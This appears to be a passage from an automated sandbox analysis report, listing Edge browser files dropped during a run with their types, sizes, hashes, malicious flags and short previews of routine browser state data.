                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJD6Oq2Pwkn23oH+Tcwt8a2jMGIFUtJbJDq7ZmwPbJDsRkwOwkn23oH+Tcwtw:78OvYfYeb8EFUtO7/85JfYeb8bJ
                                                                                                                                                                                                                                                                                                                  MD5:E5F50BF0F278B6DCAFB0DF801F99A4A2
                                                                                                                                                                                                                                                                                                                  SHA1:FCC25BCBD724D98EEEB3F945E94A6155153DAD24
                                                                                                                                                                                                                                                                                                                  SHA-256:65CBB99DEC4E90C536FD533F122C6DEFBBB7853A557B3DCB42BB6891EE262120
                                                                                                                                                                                                                                                                                                                  SHA-512:AD4EABB041CDAC42D66DB03C5202F0F92C1A1A223C22B13EDD28F811B7E49CF940642AD8F30FDE890160232FF52A6F128FED9F3F68D13C61CCFC6E27CF7620CC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.548 1900 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-04:59:17.551 1900 Recovering log #3.2025/01/09-04:59:17.557 1900 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.151008409886109
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJD6Oq2Pwkn23oH+Tcwt8a2jMGIFUtJbJDq7ZmwPbJDsRkwOwkn23oH+Tcwtw:78OvYfYeb8EFUtO7/85JfYeb8bJ
                                                                                                                                                                                                                                                                                                                  MD5:E5F50BF0F278B6DCAFB0DF801F99A4A2
                                                                                                                                                                                                                                                                                                                  SHA1:FCC25BCBD724D98EEEB3F945E94A6155153DAD24
                                                                                                                                                                                                                                                                                                                  SHA-256:65CBB99DEC4E90C536FD533F122C6DEFBBB7853A557B3DCB42BB6891EE262120
                                                                                                                                                                                                                                                                                                                  SHA-512:AD4EABB041CDAC42D66DB03C5202F0F92C1A1A223C22B13EDD28F811B7E49CF940642AD8F30FDE890160232FF52A6F128FED9F3F68D13C61CCFC6E27CF7620CC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.548 1900 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-04:59:17.551 1900 Recovering log #3.2025/01/09-04:59:17.557 1900 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.863060653641558
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                                                                                                                                  MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                                                                                                                                  SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                                                                                                                                  SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                                                                                                                                  SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40293591932113104
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                                                                                                                                                  MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                                                                                                                                                  SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                                                                                                                                                  SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                                                                                                                                                  SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.788754913993502
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                                                                                                                                                                  MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                                                                                                                                                                  SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                                                                                                                                                                  SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                                                                                                                                                                  SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"sts":[],"version":2}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.287157883552267
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YXs2sZVMdBsTpZFRudFGcsGZFGJ/NswyZ6ma3yeebsbJZC52HpWbG7nby:YXs2U8szfcdsSgns9leebsjCgHpWbZ
                                                                                                                                                                                                                                                                                                                  MD5:BD65A77FFDB1FD625A46F8BCA76D1B22
                                                                                                                                                                                                                                                                                                                  SHA1:2BC058BF84D122F9E9E0C02202989F9833C2C3C6
                                                                                                                                                                                                                                                                                                                  SHA-256:56E360E463BB6714B1F77ADA4BC5AC1814C5323D3E35E696AA028DEBD7A636D2
                                                                                                                                                                                                                                                                                                                  SHA-512:F1727C935B0F47A0A6F45DC978F4CF196375829A5A71FA489F9212D480BF277321A0B2DC824AB1F20B1878801F2B76B7E5F73733AEBE9EE21E5F81BB939C1456
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383482359540913","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383482360634955","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383482367425751","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380983979319916","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7728978409730205
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:tTmElN5hOrPf86d5I6eQNvlXcf0L/ZJVb:VmGp4PfVd5I63llXI0LhJVb
                                                                                                                                                                                                                                                                                                                  MD5:3A1CAA83B155BAC73104F44DB81E2C30
                                                                                                                                                                                                                                                                                                                  SHA1:05B97CAF6257ADE8D7BDDC3BD1869F04AF96CE0A
                                                                                                                                                                                                                                                                                                                  SHA-256:15FCEA9FEC9492C9E242DFD3A156E554D405E0D9E37CA886770D4D9054398138
                                                                                                                                                                                                                                                                                                                  SHA-512:F37A8A7ADB9E0BE1710409E7D54FDB7C84805A285CBE7502190ECE81E58C080E1C068F18FAFFFE42F85EF2DE6EC4443C2034EBDF814DBF708E96B2EB7B890959
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1106520951072352
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:T2fIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB6B:ifIEumQv8m1ccnvS6SSS
                                                                                                                                                                                                                                                                                                                  MD5:7D5A90ACFA907F9A122A5068919F5ADA
                                                                                                                                                                                                                                                                                                                  SHA1:36CA0EFD9F0A7B143E41A99C3494F40D5E7EF9DA
                                                                                                                                                                                                                                                                                                                  SHA-256:FD543A9AD9EEF275BD5493BE64BD6F17DB56969B70F0F36556AC940681CBB4F5
                                                                                                                                                                                                                                                                                                                  SHA-512:82D28C4DE78F01D462A0D88A2FA61032A4F5D7712143D3D64E0551C8939960A5D58E1C746D62BE01CF2F852BFC988ECA85D30E5073B57BF83725315E3D9DA71E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
